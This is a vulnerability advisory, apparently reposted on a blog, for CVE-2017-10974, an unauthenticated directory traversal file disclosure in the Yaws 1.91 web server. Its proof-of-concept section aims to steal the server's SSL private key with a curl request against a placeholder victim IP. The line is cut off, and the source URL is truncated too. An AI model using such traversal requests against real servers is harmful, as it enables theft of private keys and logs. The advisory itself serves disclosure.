[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.
[+] ISR: ApparitionSec
Vendor:
==========
yaws.hyber.org
Product:
===========
Yaws v1.91 (Yet Another Web Server)
Yaws is a HTTP high perfomance 1.1 webserver particularly well suited for dynamic-content web applications.
Two separate modes of operations are supported:
Standalone mode where Yaws runs as a regular webserver daemon. This is the default mode.
Embedded mode where Yaws runs as an embedded webserver in another Erlang application.
Vulnerability Type:
===================
Unauthenticated Remote File Disclosure
CVE Reference:
==============
CVE-2017-10974
Security Issue:
================
Remote attackers who can reach Yaws web server can read the server SSL private key file using directory
traversal attacks, access logs are also disclosed etc... this version is somewhat old, however, still avail for download
as of the time of this writing. http://yaws.hyber.org/
Exploit/POC:
=============
Steal Yaws Server SSL private key ".pem" file.
curl http://REMOTE-VICTIM-IP:8080/%
Komentarų nėra:
Rašyti komentarą